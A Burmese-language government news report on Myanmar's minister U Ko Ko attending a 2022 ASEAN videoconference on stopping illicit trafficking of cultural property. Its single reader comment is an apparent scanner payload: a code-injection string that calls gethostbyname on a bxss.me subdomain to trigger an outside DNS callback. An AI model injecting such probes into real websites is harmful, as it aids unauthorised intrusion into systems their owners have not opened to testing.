“International Conference on Cultural Property Protection: The Prevention of the Illicit Trafficking of Cultural Properties: An ASEAN Perspective”

ယဉ်ကျေးမှုပစ္စည်းများ အကာအကွယ်ပေးရေး နိုင်ငံတကာညီလာခံယဉ်ကျေးမှုပစ္စည်းများ တရားမဝင် ရောင်းဝယ်မှု တားဆီးရေးအာဆီယံရှုထောင့်ညီလာခံသို့ သာသနာရေးနှင့်ယဉ်ကျေးမှု ဝန်ကြီးဌာန ပြည်ထောင်စုဝန်ကြီး ဦးကိုကို တက်ရောက်

..၂၀၂၂                                                                                                  နေပြည်တော်

          ကမ္ဘောဒီးယားနိုင်ငံ၊ ယဉ်ကျေးမှုနှင့်အနုပညာဝန်ကြီးဌာနမှ ကြီးမှူး၍ ၂၀၂၂ ခုနှစ်၊ စက်တင်ဘာလ (၇) ရက်နေ့တွင် Video conferencing စနစ်ဖြင့် ကျင်းပပြုလုပ်သည့် “International Conference on Cultural Property Protection: The Prevention of the Illicit Trafficking of Cultural Properties: An ASEAN Perspective” နိုင်ငံတကာညီလာခံသို့ မြန်မာနိုင်ငံ အာဆီယံ ယဉ်ကျေးမှုနှင့် အနုပညာဆိုင်ရာဝန်ကြီး၊ သာသနာရေးနှင့်ယဉ်ကျေးမှုဝန်ကြီးဌာန ပြည်ထောင်စု ဝန်ကြီး ဦးကိုကို ဦးဆောင်သော မြန်မာကိုယ်စားလှယ်အဖွဲ့ တက်ရောက်ခဲ့ပါသည်။

          အဆိုပါအစည်းအဝေးကို ကဏ္ဍ (၂) ရပ်ဖြင့်ကျင်းပခဲ့ပြီး ပထမကဏ္ဍအနေဖြင့် နိုင်ငံတကာ စုံညီအစည်းအဝေးနှင့် အဆင့်မြင့်အရာရှိကြီးများ အစည်းအဝေးတို့အား နံနက် (၀၈:၃၀) တွင် ကျင်းပခဲ့ရာအာဆီယံနိုင်ငံများမှ အဆင့်မြင့်အရာရှိကြီးများ၊ ယဉ်ကျေးမှုအမွေအနှစ်ထိန်သိမ်းရေး ဆိုင်ရာကျွမ်းကျင်ပညာရှင်များနှင့်အစိုးရမဟုတ်သောအဖွဲ့အစည်းများမှ ယဉ်ကျေးမှုအမွေအနှစ် ထိန်းသိမ်းရေးဆိုင်ရာ ကျွမ်းကျင်ပညာရှင်များပါဝင်သည့် ကိုယ်စားလှယ်အဖွဲ့တို့ တက်ရောက်ခဲ့ ကြပါသည်။ အဆိုပါအစည်းအဝေး၌ ယဉ်ကျေးမှုအမွေအနှစ်ပိုင်ဆိုင်မှုကို ကာကွယ်မြှင့်တင်ရာတွင် တွေ့ကြုံရသည့်စိန်ခေါ်မှုများကို မျှဝေကြပြီးယဉ်ကျေးမှုအမွေအနှစ်များ တရားမဝင်ရောင်းဝယ် ဖောက်ကားမှု လျော့ပါးရေးအတွက် ပူးပေါင်းဆောင်ရွက်နိုင်မည့် အခွင့်အလမ်းများနှင့် ပတ်သက်၍ အမြင်ချင်းဖလှယ်ခဲ့ကြပါသည်။

ဆက်လက်၍ အာဆီယံယဉ်ကျေးမှုနှင့် အနုပညာဆိုင်ရာဝန်ကြီးများ (Ministers Responsible for Culture and Arts- AMCA) အစည်းအဝေးတွင် အတည်ပြုမည့် ကြေညာချက် အကျဉ်းချုပ် (Ministerial Statement) မူကြမ်းနှင့် ကမ္ဘောဒီးယားနိုင်ငံမှ ထုတ်ပြန်မည့် Media Statement မူကြမ်းတို့အပေါ် ဆွေးနွေးခြင်းများ ဆောင်ရွက်ခဲ့ပါသည်။

ဒုတိယကဏ္ဍအနေဖြင့် နေ့လယ်၁၄:၁၅နာရီတွင် အာဆီယံဝန်ကြီးများအဆင့် အစည်း အဝေးကိုကျင်းပခဲ့ရာ ယဉ်ကျေးမှုအမွေအနှစ်ပစ္စည်းများ တရားမဝင်ရောင်းဝယ်မှုတိုက်ဖျက်ရေး လုပ်ငန်းများဆောင်ရွက်ပြီးစီးမှုအခြေအနေ၊ ဆောင်ရွက်ဆဲ လုပ်ငန်းများ ၊ရှေ့ဆက်ဆောင်ရွက်မည့် လုပ်ငန်းများ၊ တွေ့ကြုံရသည့်အခက်အခဲနှင့်စိန်ခေါ်မှုများ၊ နိုင်ငံတကာအဖွဲ့အစည်းများနှင့် ပူးပေါင်း ဆောင်ရွက်မှုကြောင့် ရရှိနိုင်သည့် အကျိုးကျေးဇူးနယ်ပယ်များကို အာဆီယံနိုင်ငံအသီးသီးမှ ယဉ်ကျေးမှုနှင့် အနုပညာဆိုင်ရာဝန်ကြီးများက ဆွေးနွေးခဲ့ကြပါသည်။

အဆိုပါအစည်းအဝေး၌ မြန်မာနိုင်ငံ၊ သာသနာရေးနှင့်ယဉ်ကျေးမှုဝန်ကြီးဌာန၊ ပြည်ထောင်စု ဝန်ကြီးဦးကိုကိုက မြန်မာနိုင်ငံသည် အရှေ့တောင်အာရှတွင် ယဉ်ကျေးမှုအမွေအနှစ်များ ပေါ ကြွယ်ဝပြီး ယဉ်ကျေးမှုအမွေအနှစ်များကို စနစ်တကျ ထိန်းသိမ်းစောင့်ရှောက်ရေရှည်တည်တံ့ ခိုင်မြဲစေရေးနှင့် လူမှုစီးပွားဖွံ့ဖြိုးတိုးတက်ရေးတို့ကို ထည့်သွင်းစဉ်းစား ကြိုးပမ်း ဆောင်ရွက် လျက်ရှိပါကြောင်း၊ သာသနာရေးနှင့် ယဉ်ကျေးမှုဝန်ကြီးဌာနသည် နိုင်ငံတော်စီမံအုပ်ချုပ်ရေး ကောင်စီ၏ လူမှုရေးရည်မှန်းချက်များနှင့်အညီ ယဉ်ကျေးမှုအမွေအနှစ် ထိန်းသိမ်းကာကွယ် စောင့်ရှောက်မှု ဖွံ့ဖြိုးတိုးတက်ရေးအတွက် အရေးပါသော အခန်းကဏ္ဍမှနေ၍ ဆောင်ရွက်လျက် ရှိပါကြောင်း၊ ယဉ်ကျေးမှုအမွေအနှစ်များကာကွယ် ထိန်းသိမ်းစောင့်ရှောက်ရေးလုပ်ငန်းများကို နည်းလမ်းအမျိုးမျိုးဖြင့် စဉ်ဆက်မပြတ်အလေးထား ဆောင်ရွက်လျက်ရှိပါကြောင်း၊ မြန်မာ့ ယဉ်ကျေးမှုအမွေအနှစ်များထိန်းသိမ်းစောင့်ရှောက်ခြင်းအတွက် နိုင်ငံတော်အစိုးရက ရှေးဟောင်း ဝတ္ထုပစ္စည်းများကာကွယ်ထိန်းသိမ်းရေးဥပဒေ(၂၀၁၅) ရှေးဟောင်းအဆောက်အအုံများ ကာကွယ် ထိန်းသိမ်းရေးဥပဒေ(၂၀၁၅)နှင့် ယဉ်ကျေးမှုအမွေအနှစ်ဒေသများကာကွယ်ထိန်းသိမ်း စောင့်ရှောက်ရေး ဥပဒေ(၂၀၁၉)စသည့် ဥပဒေများပြဋ္ဌာန်းခဲ့ပါကြောင်း၊ မြန်မာနိုင်ငံအနေဖြင့်ယဉ်ကျေးမှုအမွေ အနှစ်များ ရေရှည်တည်တံ့ခိုင်မြဲအောင် ထိန်းသိမ်းကာကွယ်မှု မြှင့်တင်နိုင်ရေးအတွက် နိုင်ငံ တကာ စံချိန်စံညွှန်းများနှင့်အညီ ကုလသမဂ္ဂအဖွဲ့ဝင်နိုင်ငံများနှင့် လက်တွဲဆောင်ရွက်သွားရန်၊ ခိုးယူခြင်း သို့မဟုတ် တရားမဝင်တင်ပို့သော ယဉ်ကျေးမှုဆိုင်ရာ အရာဝတ္ထုများနှင့် ပတ်သက် သည့် UNIDROIT ကွန်ဗင်းရှင်း သဘောတူညီချက် ကို လက်မှတ်ရေးထိုးခဲ့ခြင်းဖြစ်ပါကြောင်း၊ ထို့အပြင် မြန်မာနိုင်ငံက ယူနက်စကိုအဆင့်တွင်သာမက အာဆီယံအဆင့်တွင်လည်း ပိုမိုပူးပေါင်းကြိုးပမ်း မှုများဖြင့် ပါဝင်လျက်ရှိပါကြောင်း၊ အာဆီယံအဖွဲ့ဝင်နိုင်ငံတစ်နိုင်ငံအနေဖြင့် အာဆီယံဒေသ အတွင်း တရားမဝင်လွှဲပြောင်းမှုနှင့် တရားမဝင်ရောင်းဝယ်မှု တားဆီးကာကွယ်ရေး အလုပ်ရုံ ဆွေးနွေးပွဲကို ၂၀၀၉ ခုနှစ်၊ ဇန်နဝါရီလ ၁၆ ရက်မှ ၂၀ရက်အထိပုဂံမြို့တွင် ကျင်းပခဲ့ပါကြောင်း၊ အဆိုပါအလုပ်ရုံဆွေးနွေးပွဲတွင် အာဆီယံဒေသအတွင်း ယဉ်ကျေးမှုအမွေအနှစ်များတရားမဝင် လွှဲပြောင်းမှုနှင့် တရားမဝင် ရောင်းဝယ်ဖောက်ကားမှုများကို တားဆီးရန်အတွက် အတွေ့အကြုံ၊ ဗဟုသုတနှင့် အကောင်းဆုံး အလေ့အကျင့်များကို မျှဝေပေးခဲ့ပါကြောင်း၊ ထို့ပြင်  ပျောက်ဆုံး ခဲ့သည့် ရှေးဟောင်းပစ္စည်းများ ပြန်လည်ရရှိရေးအတွက် လိုအပ်သည့် အကူအညီများရရှိရန် အပြည်ပြည်ဆိုင်ရာ ရာဇ၀တ်ရဲတပ်ဖွဲ့ (International Criminal Police Organization- INTERPOL)နှင့်ပူးပေါင်းဆောင်ရွက်လျက်ရှိပါကြောင်း၊ ယခုအစည်းအဝေးမှမိမိတို့၏ မြတ်နိုးဖွယ် ရာ ယဉ်ကျေးမှုအမွေအနှစ်အနှစ်များ ထိန်းသိမ်းစောင့်ရှောက်ရန်အတွက် အကျိုးရှိ ကောင်းမွန် သည့် ဆွေးနွေးမှုရလဒ်ကောင်းများ ထွက်ပေါ်လာမည်မှာ ဧကန်အမှန်ပင်ဖြစ်ပါကြောင်း   ပြောကြား ခဲ့ပါသည်။

အဆိုပါ နိုင်ငံတကာညီလာခံအတွင်း ကမ္ဘောဒီးယားနိုင်ငံ၊ ယဉ်ကျေးမှုနှင့် အနုပညာဝန်ကြီး ဌာနမှ ကြီးမှူး၍ ၂၀၂၂ ခုနှစ်၊ စက်တင်ဘာလ(၅)ရက်နေ့မှ (၆)ရက်နေ့အထိ နိုင်ငံတကာမှ ရှေးဟောင်းပညာရှင်များဖြင့် (၂)ရက်တာ ဆွေးနွေးပွဲများ ကျင်းပခဲ့ရာ သာသနာရေးနှင့် ယဉ်ကျေးမှုဝန်ကြီးဌာန၊ ရှေးဟောင်းသုတေသနနှင့် အမျိုးသားပြတိုက်ဦးစီးဌာန ညွှန်ကြားရေးမှူးချုပ် ဒေါက်တာကျော်ဦးလွင် ဦးဆောင်သော ကျွမ်းကျင်ပညာရှင်များ တက်ရောက်ခဲ့ကြောင်း သတင်း ရရှိပါသည်။

46 Comments

  1. ‘.gethostbyname(lc(‘hitjv’.’cnaafkdked0ce.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(105).chr(88).chr(107).chr(90).’

Leave a Reply

Your email address will not be published.